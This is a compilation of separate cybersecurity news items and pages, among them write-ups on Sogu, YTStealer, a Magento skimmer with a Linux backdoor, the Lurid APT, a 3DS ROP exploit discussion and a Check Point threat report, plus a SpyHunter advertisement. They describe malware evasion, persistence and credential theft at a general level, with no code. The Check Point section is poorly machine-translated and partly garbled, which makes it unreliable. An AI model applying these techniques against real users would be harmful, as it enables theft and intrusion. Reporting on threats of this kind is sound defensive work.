File attachments seeded with Trojan droppers for installing Sogu Trojans may disguise with file formats common to Microsoft Office, such as XLS or DOC. Opening the offending document may trigger the installation of Sogu, allowing third parties to gain full access to the affected PC. A legitimate document also may be opened during Sogu's installation, seemingly to distract the victim from the attack. As a result, third parties easily could use Sogu to bypass the network firewall or install other threats with even more in-depth attack features than Sogu.
Some versions of Sogu Trojans also included spyware-associated functions, such as keylogging or taking screen captures. These attacks enabled the theft of information, automatically transferred over to a C&C server.
Taking a Lesson in E-mail Safety to Heart
Sogu's attacks don't corroborate to any hard-defined symptoms. Even the presence of files on your hard drive may be uncertain; malware experts have observed 'no-file' memory-injecting attacks from Sogu similar to those of Naid, another Trojan tied to Axiom. The clearest evidence of a Sogu attack is the initial opening of an exploit-hosting file attachment, which updated anti-malware products should be able to confirm as threatening.
Sogu is specific to Windows computers, and, like many threats from Axiom, may be used in attacks against specific non-profits, governments and corporations. Routine anti-malware scans of all systems suspected for being at risk of Sogu campaigns should provide all the protection needed, in the event of a failure of standardized e-mail security. However, outdated security tools are likely to be poorly-equipped to deal with Sogu. The Axiom group has a long history for creating new, specialized variants of old threats, including Sogu variants that could avoid old detection heuristics.
Use SpyHunter to Detect and Remove PC Threats
If you are concerned that malware or PC threats similar to Backdoor.Sogu may have infected your computer, we recommend you start an in-depth system scan with SpyHunter. SpyHunter is an advanced malware protection and remediation application that offers subscribers a comprehensive method for protecting PCs from malware, in addition to providing one-on-one technical support service.
Why can't I open any program including SpyHunter? You may have a malware file running in memory that kills any programs that you try to launch on your PC. Tip: Download SpyHunter from a clean computer, copy it to a USB thumb drive, DVD or CD, then install it on the infected PC and run SpyHunter's malware scanner.
File System Modifications
Tutorials: If you wish to learn how to remove malware components manually, you can read the tutorials on how to find malware, kill unwanted processes, remove malicious DLLs and delete other harmful files. Always be sure to back up your PC before making any changes.The following files were created in the system:
%UserProfile%\Application Data\winsvcfs.DLLFile name: %UserProfile%\Application Data\winsvcfs.DLL
File type: Dynamic link library
Mime Type: unknown/DLL
|
November 10, 2005 11:30 PM PST
New Windows Trojan causes confusion
- Related Stories
Image-handling flaws put Windows PCs at riskNovember 8, 2005
On Wednesday, the Tokyo-based antivirus company said it had discovered a Trojan horse that used an image-rendering flaw in Windows to attack systems, a day after Microsoft had provided a fix for the vulnerability. But late Thursday, Trend Micro said its initial analysis of the Trojan might be incorrect.
"We asked another team to start the disassembly process again," said Raimund Genes, chief technologist for Trend Micro in Europe. That means researchers will reinvestigate the Trojan code to see what it does.
The Trojan is referred to as "emfsploit.a" by Trend Micro. Initially, the antivirus software maker reported that the malicious code would crash "explorer.exe" on unpatched Windows machines. Explorer runs key parts of the Windows graphical user interface, including the Start menu, taskbar, desktop and file manager.
Trend Micro has updated the entry in its antivirus encyclopedia on the Trojan. The entry no longer states that "emfsploit.a" exploits the Windows vulnerability, but instead it says that it "exhibits behavior similar to the Enhanced Metafile vulnerability of MS05-053."
"Our Trend Labs team is currently working with Microsoft to resolve whether TROJ_EMFSPLOIT.A does indeed fall under the category of code exploiting the MS05-053 vulnerability or whether it is only a related piece of code but not totally exploiting MS05-053," Genes said in an e-mail to CNET News.com.
Trend Micro has found that the Trojan does cause a crash on certain Windows XP systems, but the finding is not consistent with Microsoft's Tuesday bug report. Trend found a crash only on Windows XP computers without Service Pack 1. But according to Microsoft, the vulnerability also affects systems with SP1 and SP2, so these should crash as well if the Trojan indeed exploits the MS05-053 flaw.
Trend Micro describes the new Trojan as a "proof of concept." It received one sample of the code from a customer in Japan, but as of late Thursday the Trojan hasn't actually been detected anywhere else, Genes said. The company hence rates the overall risk "low."
The vulnerability the Trojan was thought to exploit lies in the way Windows handles certain graphics files. Microsoft provided a fix for three such flaws on Tuesday as part of its monthly patching cycle.
The Windows vulnerabilities relate to how the operating system renders the Windows Metafile (WMF) and Enhanced Metafile (EMF) image formats, Microsoft said Tuesday in its MS05-053 security bulletin. The software maker tagged the bulletin "critical," its most serious rating.
A Microsoft representative said the company is investigating the Trojan report, but added that it is not currently aware of attacks that use it.
Microsoft urges Windows users to apply the MS05-053 update as soon as possible. However, some users of Microsoft's free Software Update Services patching tool have reported trouble in obtaining the patch.
|
Here is a picture to get you excited - http://imgur.com/Bgucg And yes I know the picture doesn't prove anything...
Who knows if it will amount to anything. If it means no more region lock, hell yeah.
So, it's a step.Basically, the 3DS uses a security mechanism where only certain parts of memory can be executed. This means you can't load your own code and execute it. However, you can use a technique called "ROP", which as I understand it basically means executing parts of code already loaded in executable memory. So for example, say you want to run a particular instruction; you find somewhere that instruction is loaded, then do smash the stack and make execution jump to that location. Obviously, this isn't an ideal situation as you are limited to using what is loaded in memory, and it's not very straight forward. So the best option would be to use ROP to execute a kernel exploit, disable the security system and thus allow executing code from anywhere in memory (or at least from somewhere you can influence from code). Then you can load code into memory and run it freely.
<delroth> [06:10:31] yellows8: finally found a kernel exploit or is that still done through ram haxx / ROP?
<yellows8> [06:10:54] not the kernel :)
<delroth> [06:11:23] trust chain broken? :P
<yellows8> [06:11:37] no
<yellows8> [06:47:04] there's only *two* vulns currently known which allow code exec and is usable from arm11 userland ROP. since the two vulns are basically identical, both would surely be fixed in a single sysupdate.
However, yellows8 said it's not a kernel exploit, but then says there are two vulnerabilities that allow code execution from ROP; I guess there must be some other way of doing it other than a kernel exploit. I don't know the technical details of the vulnerability being exploited here.
It's worth noting that this is *two* exploits; one userland exploit (which allows ROP; this is probably a savegame exploit or something similar), and the other vulnerability to allow code execution (this vulnerability is exploited via ROP).
EDIT: Oh yeah, and I should have mentioned that as seen above, there are only two known vulnerabilities for code execution, and both would most likely be patched at once, so I'd guess it's unlikely there'll be a release unless another, more unique, vulnerability found for yellows8 (and those he chooses to share with) to use for further exploration once the released exploit is patched.
As far as I know, it's not a useable hack right? There's no practical(easy) way for non-hackers to be able to run homebrew in DSI mode.
The picture originates from the author of the dsi mode hack Sudokuhaxx, yellows8.
So it looks to be legit, if only it concerns a usermode exploit.
Or it'll be something that overrides firmware updates like the DS flash carts keep doing.
Eh, but I'll believe it when I'll see it in action, I mean when I'll see a game from JP running on a Western 3DS. And probably there will be a firmware update that will block this in the future. XD
Let's not kid ourselves into thinking these hackers are doing it for the good of 3DS owners or to bring justice to the evil Nintendo corporation for region locking the system.
I feel bad for Nintendo if this is true, but fuck it, they brought it on themselves with region lock and the fact that they suck at promoting localizations. Hope it's real.
Sounds like a small step and anything useful is still very far away.
I quote SifJar from the GBAtemp forums:
So, it's a step.
Obviously, this isn't an ideal situation as you are limited to using what is loaded in memory, and it's not very straight forward. So the best option would be to use ROP to execute a kernel exploit, disable the security system and thus allow executing code from anywhere in memory (or at least from somewhere you can influence from code). Then you can load code into memory and run it freely.
|
Security researchers have discovered that attackers are also deploying a Linux backdoor to compromised e-commerce servers after injecting a credit card skimmer into online store websites.
The PHP-encoded web skimmer (a script designed to steal and exfiltrate payment and customer personal information) is added and camouflaged as a .JPG image file in the / app / design / frontend / folder.
Attackers use this script to download and inject fake payment forms on the payment pages displayed to customers by the hacked online store.
“We discovered that the attacker started with automated e-commerce attack probes, testing dozens of weaknesses in common online store platforms,” the Threat Research team revealed. Sansec.
“After a day and a half, the attacker found a file download vulnerability in one of the plugins in the store. He then downloaded a webshell and modified the server code to intercept customer data.”
Linux malware not detected by security software
The Golang-based malware, spotted by Dutch cybersecurity company Sansec on the same server, was downloaded and executed on breached servers as the linux_avp executable.
Once started, it immediately removes itself from disk and camouflages itself as a “ps -ef” process which would be used to get a list of running processes.
By analyzing the linux_avp backdoor, Sansec discovered that it was waiting for commands from a Beijing server hosted on Alibaba’s network.
They also found that the malware would gain persistence by adding a new crontab entry that would re-download the malicious payload from its command and control server and reinstall the backdoor if it is detected and removed or the server reboots. .
So far, this backdoor has not been detected by anti-malware engines on VirusTotal even though a sample was first uploaded over a month ago on October 8.
The downloader could be the creator of linux_avp since it was submitted a day after researchers at Dutch cybersecurity company Sansec spotted it while investigating the e-commerce site breach.
|
Web Security Dojo is a web application security lab with tools, targets, and training materials built into a Virtual Machine(VM). It is an open source project built on Ubuntu and hosted at SourceForge. It is available in three flavors: a Virtualbox VM, VMWare VM, and a build script which can be used on a standard Ubuntu 9.10 install to produce the Dojo. It is available free of cost.
Targets: * OWASP WebGoat, * Damn Vulnerable Web App, * Hacme Casino, * OWASP InsecureWebApp, * custom PHP scripts including REST and JSON labs
Tools: * Burp Suite (free version), * w3af, * OWASP Skavenger, * OWASP Dirbuster, * Paros, * Webscarab, * Ratproxy, * sqlmap, * helpful Firefox add-ons
src- Web Security
|
SECURITY RESEARCHERS at antivirus vendor Trend Micro have uncovered a large-scale cyber espionage operation that uses malware to steal information from hundreds of computers belonging to many governments, mostly in the former USSR.
"The countries most impacted by this attack are Russia, Kazakhstan and Vietnam, along with numerous other countries - mainly in the CIS (Commonwealth Independent States - or former Soviet Union)," the Trend Micro researchers noted.
The attack, dubbed 'Lurid', is of the APT variety - that's "advance persistent threat" in IT security terminology - and includes social engineering, vulnerability exploits and information stealing malware.
Like most APT attacks, Lurid starts with well-crafted rogue emails sent to people working for targeted organizations. In this case these are diplomatic missions, government institutions, government contractors, research centres, and so on.
The emails spread documents rigged with exploits for vulnerabilities in older versions of Adobe Reader, a piece of software whose update rate is usually very low in business environments.
Once an exploit is successful, a piece of malware known as the Lurid Downloader or 'Enfal' is deployed to steal information and monitor communications.
In total, this operation has managed to compromise over 1,460 computers from 61 different countries. The machines are infected with malware tagged with 300 unique identifiers, each only assigned to a particular campaign.
The command and control infrastructure includes 15 domain names hosted on 10 different IP addresses that the attackers use for sending commands to get directory listings and transfer files.
"Although our research didn't reveal precisely which data was being targeted, we were able to determine that, in some cases, the attackers attempted to steal specific documents and spreadsheets," the Trend Micro researchers said.
Russia was by far the primary target of this operation, hosting over 1,000 of the infected computers. Kazakhstan was second with 325 and Ukraine third with 102.
APT is a term often overused by security vendor marketing departments. When McAfee released a report about a similar operation back in August other security experts called it hype. This might be the case now as well, but one thing is certain - the US, EU and their allies are not the only targets of cyber espionage attacks.
|
A new Trojan-based virus is spreading online and attacking unsuspecting YouTube content creators. It’s called YTStealer, and, as the name suggests, it’s designed to attack a specific target: YouTubers. If you have the slightest suspicion that YTStealer might have infiltrated your computer, you must take immediate steps to detect and remove it. Otherwise, this malware can affect your entire system and all the data stored on it.
So what is YTStealer? How does it work? And how can you protect yourself from it?
How Does YTStealer Work?
There are numerous types of malware, and many have targeted YouTube as it has long been a valuable resource for criminals who can reach a large audience with their scams by stealing the accounts of major content creators.
YTStealer is a Trojan, sold on the Dark Web, and can steal authentication cookies from YouTube creators, meaning cookies are used to save a user’s memory to allow them to login in the future without re-entering credentials.
YTStealer does not take over other social networks; it is exclusively designed to steal YouTube credentials. In most cases, YTStealer infections do not have any particular symptoms, so its timely detection can be challenging. Victims may have no idea that they have been infected until the malware has caused severe problems. That’s why to detect and remove such malware before they do any real damage, you must run a full system scan using any reputable antivirus software.
YTStealer can also work as a backdoor to your computer for ransomware or spyware infections, or as a tool for espionage and data theft. So, if not removed in time, YTStealer will give cybercriminals access to your device and allow them to modify, corrupt, replace, and install whatever they want.
How Does a YTStealer Infection Happen?
Cybercriminals typically spread Trojans via enticing ads, phishing sites, legitimate-looking emails and attachments, supposed deals, and sometimes even bogus upgrade requests purporting to be sent by a legitimate software developer. Unfortunately, in many cases, users click on them without scanning them for hidden malware, which is how most infections occur.
In this case, YTStealer promotes a variety of specific applications designed to lure YouTube creators. These applications are usually fake versions or updates for video editing tools (good examples include OBS Studio, Adobe Premiere, HitFilm Express, Sony Vega, etc.).
Once a target has been infected, YTStealer will perform an environment check to ensure it is not running inside a virtual machine (or a sandbox) and is being analyzed by security programs. The code used by YTStealer to perform this comes from the Chacal open-source project hosted by GitHub. If YTStealer detects it is being analyzed, it will typically self-terminate. If it feels there is no threat to itself, YTStealer will start to harvest authentication cookies and credentials.
YTStealer will also open the browser in the background, ie without anything appearing on the computer screen. Hackers will then be able to swipe cookies into the phantom browser and remotely log into your YouTube Studio page. From here, hackers can either post whatever they want (this could be a fake promo, a malicious link, or an attempt to sell something) or harvest your data.
Once the malware steals everything it can—channel information, number of subscribers, which videos are monetized, and more—the stolen data is collated, encrypted, and sent to a private server registered with a legitimate company.
How to Get Rid of the YTStealer Virus
This malware can be quickly taken care of with a trusted antivirus or a malware removal tool. Any good antivirus program can effectively prevent interaction through such malicious transmitters by notifying you and prompting you to take the necessary steps to avoid or remove the threat. Most antivirus suites will remove any infections automatically and list what has been detected.
What Sets YTStealer Apart From Other Trojan Viruses?
YTStealer acts similar to other Trojans, except that its sole purpose is to steal YouTube credentials and authentication cookies; similar Trojans focus instead on harvesting credentials for everything they can get hold of. YTStealer does this to monetize your data, subscribers, and videos.
In every other aspect, it acts like every Trojan: it infects your computer through a fake app, runs an environmental check, and immediately starts stealing targeted data.
|
48. A Riddle APT In An Enigma
Here are a few highlights from each article we discussed:
- The Turla Group is an APT threat that’s based out of Russia. They’ve been spotted and associated with attacks all over the private, public and govt sectors. From a TTP perspective, they’ve been associated with recycling old malware from other threat groups and reusing those in their attacks which is a really interesting tactic. Malware such as PlugX and Winnti (which are associated with Chinese based threat groups) are examples.
- This type of tactic is excellent at misattribution due to how threat intelligence operates.
- Kaspersky recently found that the threat group behind Reductor targeting European citizens bundled a spoofed visa application service inside of an executable. It’s unknown how the executable has been distributed, which is interesting from an attacker perspective. Reductor is sophisticated in how it poisons other files as a persistence/spreader mechanism by injecting itself and also has the capabilities of traditional RAT malware.
- Back in 2019, Kaspersky found a new variant of the COMpfun malware that they labelled as Reductor. One of the key features about COMpfun and Reductor is their ability to intercept TLS encrypted communications and spread itself via mounted devices like network shares or USB drives.
- Based on the victimology of Reductor and COMPfun the researchers at Kaspersky were able to with a high likelihood of confidence say that the Turla group is associated.
- These are the stages of the malware and main module:
- Initial delivery is unknown, could be a via www page or email
- User runs the dropper EXE
- Reductor then enumerates all mounted devices, spreads itself via injecting into other PE’s or doc/pdfs
- Keylogging, screenshots are big capabilities with Reductor, like many traditional RATs.
- This malware trojan is a treasure trove of PII at risk from victims. Credentials for personal accounts, social media, medical, e-mail, etc are great pivot points into a full user compromise.
- So the model that Google and Apple proposed uses bluetooth low energy and cryptography in their protocol design to provide some privacy for users—it is based on the DP-3T specification. They are also proposing that their protocol operates on the operating system layer where some of the other more, shall we say invasive, protocols are designed to operate with special privileges above those of normal apps which opens up all kinds of security and privacy problems for the user right? According to the ACLU, the Google and Apple proposal mitigates a lot of glaring privacy and security risks by the way it is designed and protects user privacy. Google and Apple also want to call it an exposure notification service instead of a contact tracing system. Everything is a name and that sounds a lot less Big Brother. To go a bit further in here the way it works is by having a rolling key tied to the bluetooth low energy hardware address and that key then will change every 15-20 minutes on a rolling schedule, to put it simply. That’s the privacy preserving portion. Google and Apple also want to manage the application so they can pull it from their devices when done. They, rightfully, don’t trust the government to do this in any sane, secure, or noninvasive way. Germany, Italy, Austria and Switzerland are already falling in line with the DP-3T spec while the UK and France are not — even though a study by the European Union said it aligns with GDPR privacy standards. We have yet to see what happens here.
- The Healthy Together App they’re calling it collects GPS, cell tower triangulation, and Bluetooth data to pinpoint users along with all of the user’s personal information. The company behind the app is called Twenty Holdings and they make in-person social apps for people to find each other. The data collected is just shared with health workers and Twenty Holdings employees unless you test positive, then all your location, symptom and other data gets handed over to the state. It’s the kind of thing Apple and Google were trying to avoid by having their app use cryptographic identifiers to protect users.
- Utah officials are convinced that it will help them slow the spread and reopen the economy. I’m not sure what the cost is on that though if you end up giving up even more of your location and health data. I don’t like a model where you get to delete all of that after this is all over. I may be a bit of a tinfoil hat though.
- There’s no privacy terms. They say it’s opt-in, but what about when establishments start requiring you to have the app to shop or otherwise? Opt-in is a few heavy suggestions away from mandatory.
- Most countries are looking at the Apple/Google model. The UK is testing their own app right now that the NHS is working on. India also built their own.
- All these companies don’t have security in mind. Apple and Google have been doing this a long time and their model is a published, cryptographically sound way to alert users when they’ve come into contact with the infected AND maintain their data privacy. I guarantee you someone will find holes in these apps just like they did with the one in India. Security researchers are salivating at a chance. India’s published app basically allows you to find the location data of anyone who has tested positive for COVID. It’s a glaringly obvious mistake.
Two Truths and a Lie
Introducing our newest segment on Breaking Badness. We are going to play a game you are all likely familiar with called two truths and a lie, with a fun twist. Each week, one us with come prepared with three article titles, two of which are real, and one is, you guessed it, A LIE.
You’ll have to tune in to find out!
This Week’s Hoodie/Goodie Scale
Promises are Like Pie Crust, Made to be Trojan
[Chad]: 8.5/10 Hoodies
[Tarik]: 8.5/10 Hoodies
Utah Kicks Over the Traces
[Chad]: 10/10 Hoodies
[Tarik]: 10/10 Hoodies
That’s about all we have for this week, you can find us on Twitter @domaintools, all of the articles mentioned in our podcast will always be included on our podcast recap. Catch us Wednesdays at 9 AM Pacific time when we publish our next podcast and blog.
*A special thanks to John Roderick for our incredible podcast music!
|
Security researchers recently unearthed as many as nine security vulnerabilities in Dell EMC's Isilon OneFS platform that allowed remote attackers to launch social engineering attacks and subsequently access the Isilon systems at root.
Dell EMC's Isilon OneFS platform, which is a scale-out network-attached storage platform offering up to 50 petabytes worth high-volume storage, backup and archiving of unstructured data, was recently found to contain nine security vulnerabilities that could allow remote attackers to perform various tasks to compromise the security of data stored by the platform.
According to security firm CoreLabs who discovered the vulnerabilities, the latter were found in the web console of the Isilon OneFS platform and made the console vulnerable to cross-site request forgery. The said vulnerabilities were first reported by the firm to Dell and were finally patched by the company on 12 February.
While analysing the Isilon OneFS platform, the researchers discovered that the Web Console contained several sensitive actions that could be exploited or abused by remote attackers. These actions included adding new users with SSH access or re-mapping existing storage directories to allow read-write-execute access to all users.
Because of the absence of anti-CSRF tokens on the Web interface, CoreLabs explained that a remote attacker could submit authenticated requests whenever any authenticated user browsed through a domain controlled by the attacker. To submit such a request, an attacker could use social engineering tactics like sending phishing emails to authenticated users to lure him/her to click on links to websites that were compromised by the attacker.
The researchers also discovered that if a remote attacker were to obtain access to a system by fooling authenticated users, the attacker could use the privileges escalation vulnerabilities to run shell commands or arbitrary Python code with root privileges.
Thanks to such cross-site scripting vulnerabilities, users or administrators of the Web console could be forced by an attacker to execute arbitrary scripts and leak out cookies through social engineering tactics. Using these cookies, a hacker could then impersonate an authenticated user to gain access to the system.
Dell EMC reports that has no knowledge of any attacks on its customers related to these vulnerabilities in Isilon OneFS. In an email to SC Media UK Dell EMC has released security updates to address the reported vulnerabilities in Isilon OneFS and alerted its customers via security advisory (DSA-2018-018) available at: https://support.emc.com/kb/517728. Registered Dell EMC Online Support customers can download OneFS updates from the Downloads for Isilon OneFS page of the Dell EMC Online Support site at https://support.emc.com/downloads/15209_Isilon-OneFS.
In a statement the company says "With software vulnerabilities a fact of life in the technology industry, Dell EMC follows best practices in managing and responding to security vulnerabilities in our products. Our goal is to provide customers with timely information, guidance and mitigation to address threats from vulnerabilities. This is a good example of coordinated disclosure in action. More details on the Dell EMC documented Vulnerability Response Policy can be found at: https://www.emc.com/products/security/product-security-response-center.
This isn't the first time that security vulnerabilities were discovered in Dell EMC's products. In July last year, researchers discovered a high severity vulnerability in the EMC Secure Remote Support (ESRS) Policy Manager that could allow hackers to gain web access and take information from applications. Again Dell EMC points out that it has no knowledge of a successful attack or known exploit related to these reported vulnerabilities.
The vulnerability pertained to the presence of an undocumented account (OpenDS admin) with a default password in the product. According to an advisory issued by Dell EMC, a remote attacker with the knowledge of the default password could log in to the system and gain administrator privileges to the local LDAP directory server.
"If an attacker can trick an Isilon OneFS administrator into visiting an attacker-controlled website (eg: via a phishing attack) while the administrator is logged in, then the attacker will be able to get access to the system by creating a new administrator user (due to the Cross-Site Request Forgery vulnerability) or hijacking the administrator's session and impersonating him by leveraging any of the Cross-Site Scripting vulnerabilities," said Alberto Solino, director of research from Core Advisories Team at SecureAuth + Core Security.
"These types of issues (Cross Site Request Forgery and Cross Site Scripting) are issues we're seeing repeatedly while testing security products. In this specific case, in order to ensure users of Ision OneFS are not victimised by these specific vulnerabilities reported, it is imperative to apply the vendor supplied patches," he added.
In an email to SC Magazine UK, Mark James, security specialist at ESET, said: “With the understanding that vulnerabilities and exploits are bad for everyone, it's good to see the continued interest in finding and correctly reporting such occurrences. It allows responsible vendors to fix holes and release patches in a timely manner, and where needed, may even encourage a vendor to act faster to protect the individuals or organisations that may be affected by any exploits created. Most companies do not have the expertise or knowledge to find these vulnerabilities in the first place, so utilising the outside expertise helps everyone."
He added that affected customers of vulnerable platforms like Dell EMC's Isilon OneFS should either uninstall the software until a patch arrives or should keep their patch and update policies up to date and executed in a timely manner to avoid being victimised by hackers.
|
The United Nations (UN) initiated a probe against North Korea over allegation of illegally raising money for weapons of mass destruction programs through cyberattacks launched against 17 countries.
The Asian country was accused of raising $2 billion from its increasingly sophisticated cyber activities against financial institutions and cryptocurrency exchanges. South Korea was the most hit as they suffered 10 attacks. The nation’s Bithumb cryptocurrency exchange was reportedly hacked at least four times.
India suffered three cyberattacks, while Bangladesh and Chile each had two attacks. The remaining thirteen nations which suffered one attack each are Costa Rica, Gambia, Guatemala, Kuwait, Liberia, Malaysia, Malta, Nigeria, Poland, Slovenia, South Africa, Tunisia and Vietnam.
Asides mining cryptocurrency via illicit cryptojacking malware to fund a “professional branch of the military”, North Korea Government’s hackers were also accused of taking over the ATM network for an entire nation in a particular attack and making over 10,000 payments.
North Korea’s hacking experts also reportedly carried out attacks through the SWIFT bank messaging network, “with bank employee computers and infrastructure accessed to send fraudulent messages and destroy evidence.” The allegation is being investigated as attempted violations of U.N. sanctions.
Source : https://www.lindaikejisblog.com/2019/8/un-probes-north-korea-for-stealing-money-from-nigeria-others-through-cyberattacks-2.html
|
Week in review 8 August 2014
This week we saw parcel phishing emails, a new disturbingly stealthy form of malware, and a Trojan that appears to have been undetected since 2012. Android users have been affected by a Remote Access Technology (RAT) exploit, and there is yet another Facebook phishing campaign underway. Getting a parcel is usually welcome news.
Not so welcome is an email supposedly from Australia Post claiming they are holding a parcel for you, and warning that parcels unclaimed after 30 days attract a daily fee. The email leads to a false site, with the aim of capturing user details. Whilst the email letterheads were realistic, there were a few indications the email was false. Australia Post sent out tweets warning customers of the scam.
A new malware threat called Poweliks came to light this week. Poweliks can run from the system registry and does not create files, making it hard to detect. Further, Poweliks can persist through reboots, making it unique (so far) in malware that resides in the system registry. Poweliks will also download other types of malware, according to what the attacker wishes to do. It does look to be part of a dangerous new breed of system registry malware. Another RAT that surfaced this week was the IcoScript Trojan. It looks like this Trojan has been around since 2012, but has only just been uncovered. There is a big reason for this: IcoScript uses specially created emails containing commands from a controlling account.
Typically the controlling email account uses Google or Yahoo. The traffic does not look unusual so corporates don’t block it. A type of social engineering is used in the fourth news item this week. Some person(s) have crafted emails that look like they are from Kaspersky Labs. The emails tell the user that their Android phone has a virus, and that they can resolve this issue by downloading an attachment called Kaspersky_Mobile_Security.apk. However, the file is actually SandroRAT malware. The malware, once installed, can intercept phone calls and SMS. It may also download other malware.
Because of its size, Facebook is the target of many phishing campaigns. Another one came to light this week. Once again, an email supposedly from Facebook contains a link to a false site, with the aim of stealing the user credentials. The reach of Facebook practically ensures that it will be a target for phishing campaigns.
|
Check Point Research, its Threat Intelligence division Check Point Software Technologies Ltd., a provider of cyber security solutions worldwide, published the Global Threat Index for the month of January 2022.
Researchers say that Emotet has now moved Trickbot out of the top spot after a long stay at the top and is the most prevalent malware of the month, affecting 6% of organizations worldwide. Log4j also remains a problem, affecting 47,4% of organizations worldwide, while as the industry with the most attacks it is still that of Education / Research.
Just two and a half months after its return, Emotet has taken first place. The infamous botnet usually spreads through phishing emails that contain malicious attachments or links. Its increased use has been further helped by the prevalence of Trickbot as a catalyst, spreading malware further. At the same time, we have Dridex removed from the top ten list and replaced by Lokibot, an InfoStealer used to obtain data such as e-mail credentials, CryptoCoin wallet passwords and FTP servers.
"It's no surprise that Emotet has returned vengeful. It is malicious software that escapes, making it difficult to detect, and the fact that it uses multiple methods to infect networks further contributes to the constant rise of this threat. "It's unlikely to be a short-term problem," said Maya Horowitz, VP Research at Check Point Software. "This month we also saw Dridex disappear from the list of the top ten and Lokibot reappear. Lokibot exploits victims in their busiest moments, as it is distributed through well-disguised phishing emails. "These threats, along with the ongoing battle with the Log4j vulnerability, underscore the importance of having better security on networks, the cloud, mobile and endpoints."
Check Point Research (CPR) revealed this month that the Education / Research sector remains the most under attack in the world, followed by the Government / Armed Forces and the ISP / MSP. "Apache Log4j Remote Code Execution" is still the most commonly exploited vulnerability, affecting 47,4% of organizations worldwide, followed by "Web Server Exposed Git Repository Information Disclosure" which affects 45% of organizations worldwide. HTTP Headers Remote Code Execution ranks third on the list of most commonly exploited vulnerabilities, with a global impact of 42%.
The main families of malware
* Arrows are related to the change in ranking compared to the previous month.
This month, Emotet is the most popular malware affecting 6% of organizations worldwide, followed closely by Trickbot with a 4% impact and then Formbook with a 3% impact.
- ↑ Emotet Emotet is an advanced, self-propagating and modular Trojan. Emotet, once used as a banking Trojan, has recently been used as a distributor for other malware or malware campaigns. Uses multiple methods to maintain obsession and avoidance techniques to avoid detection. Additionally, it can be spread by phishing spam emails containing malicious attachments or links.
- ↓ Trickbot - Trickbot is a modular Botnet and banking Trojan that is constantly updated with new capabilities, features and distribution channels. This allows Trickbot to be a flexible and customizable malware that can be distributed as part of a multi-purpose campaign.
- ↓ Formbook - Formbook is an Info Stealer that collects credentials from various web browsers, collects screenshots, monitors and records keystrokes, and can download and execute files according to C&C commands.
The industries that receive the most attacks worldwide
This month, the Education / Research sector is at the top of the list of the world's most attacked, followed by the Government / Armed Forces and the ISP / MSP
- Education / Research
- Government / Armed Forces
- ISP / MSP
The most commonly exploited vulnerabilities
This month the Apache Log4j Remote Code Execution "Is still the most commonly exploited vulnerability, affecting 47,4% of organizations worldwide, followed by" "Web Server & Hosting Exposed Go Repository Information Disclosure ”Which affects 45% of organizations worldwide. THE "HTTP Headers Remote Code ExecutionIs in third place on the list of most frequently exploited vulnerabilities, with a global impact of 42%.
- Ση Remote code execution Apache Log4j (CVE-2021-44228) - A remote code execution vulnerability exists in Apache Log4j. Successfully exploiting this vulnerability could allow a remote intruder to execute arbitrary code on the affected system.
- ↔ Web Server & Hosting Exposed Go Repository Information Disclosure - A vulnerability has been reported in the Git Repository. Successfully exploiting this vulnerability could allow unintentional disclosure of account information.
- ↔HTTP Headers Remote Code Execution (CVE-2020-10826, CVE-2020-10827, CVE-2020-10828, CVE-2020-13756) - allows the client and server to transmit additional information with an HTTP request. A remote intruder can use a vulnerable HTTP header to execute arbitrary code on the victim's machine.
Top Malicious Mobile Apps
This month xHelper tops the list as the most prevalent mobile malware, followed by AlienBot and FluBot.
- xHelper - A malicious application that has not appeared in nature since March 2019 and is used to download other malicious applications and display ads. The application is capable of being hidden from the user and reinstalled in case it has been uninstalled.
- AlienBot - The AlienBot family of malware is a Malware-as-a-Service (MaaS) for Android devices that allows a remote intruder, in the first instance, to enter malicious code into legitimate financial applications. The attacker gains access to the victims' accounts and eventually takes full control of their device.
- flubot - FluBot is an Android botnet malware that is distributed via SMS phishing, which most often implies logistics delivery brands. As soon as the user clicks on the link in the message, FluBot is installed and accesses all the sensitive information on the phone.
The complete list of the most common malware threats in Greece for January 2022 is:
Emotet- The Emotet is an advanced, self-propagating and modular Trojan that was once used as a banking Trojan and now distributes other malicious programs or malicious campaigns. Emotet uses multiple methods to maintain its obsession and avoidance techniques to prevent detection and can be spread through spam emails containing malicious attachments or links.
Lokibot - The LokiBot was first identified in February 2016 and is a commodity infostealer with versions for both Windows and Android OS. Collects credentials from various applications, web browsers, e-mail programs, IT management tools such as PuTTY and more. LokiBot is sold in hacking forums and it is believed that its source code was leaked, thus allowing the appearance of numerous variations. As of late 2017, some versions of LokiBot for Android include ransomware functionality in addition to information theft capabilities.
Formbook- FormBook is an Infostealer that targets the Windows operating system and was first identified in 2016. It is marketed as Malware as a Service (MaaS) in underground hacking forums for its powerful avoidance techniques and its relatively low price. FormBook collects credentials from various web browsers, collects screenshots, monitors and records keystrokes, and can download and execute files as instructed by its C&C.
AgentTesla- The agent Tesla is an advanced RAT that acts as a keylogger and password thief and has been active since 2014. AgentTesla can track and collect the victim's keyboard input and clipboard, while it can capture screenshots and extract credentials for various software installed on the victim's machine (such as Google Chrome, Mozilla Firefox, and the Microsoft Outlook email client). AgentTesla is sold in various online shopping and hacking forums.
NanocoreNanoCore is a remote access Trojan that targets Windows users and was first spotted in nature in 2013. All versions of RAT contain basic add-ons and features such as screen capture, cryptocurrency extraction, remote desktop control and theft camera session.
TrickbotTrickbot is a modular banking Trojan attributed to the WizardSpider cybercrime gang. It is mainly delivered through spam campaigns or other families of malware, such as Emotet and BazarLoader. Trickbot sends information about the infected system and can also download and execute arbitrary modules from a wide range of available modules, including a VNC module for remote control and an SMB module for distribution within an infected network. Once a machine is infected, the malicious carriers behind this malware use this wide range of modules not only to steal bank credentials from the target computer, but also to move around and identify the target organization itself. before carrying out a targeted ransomware attack across the company.
RemcosRemcos is a RAT that first appeared in the wild in 2016. Remcos is distributed through malicious Microsoft Office documents that attach to SPAM emails and is designed to bypass Microsoft Windowss UAC security and run high-level malware privileges.
Vidar- Vidar is an infostealer that targets Windows operating systems. It was first detected in late 2018 and is designed to steal passwords, credit card data and other sensitive information from various internet browsers and digital wallets. Vidar is sold on various online forums and is used as a malware dropper to obtain ransomware GandCrab as a secondary payload.
MassLogger- MassLogger is a .NET credential thief. This threat is an identification tool that can be used to extract data from targeted servers.
DanabotDanabot is a modular banking Trojan written in Delphi that targets the Windows platform. The malware, which was first observed in 2018, is distributed via malicious spam messages. Once a device is infected, the malware downloads an updated configuration code and other modules from the C&C server. Available modules include a if sniffer¿ for spying on credentials, a stealer for stealing passwords from popular applications, a VNC module for remote control, and more.
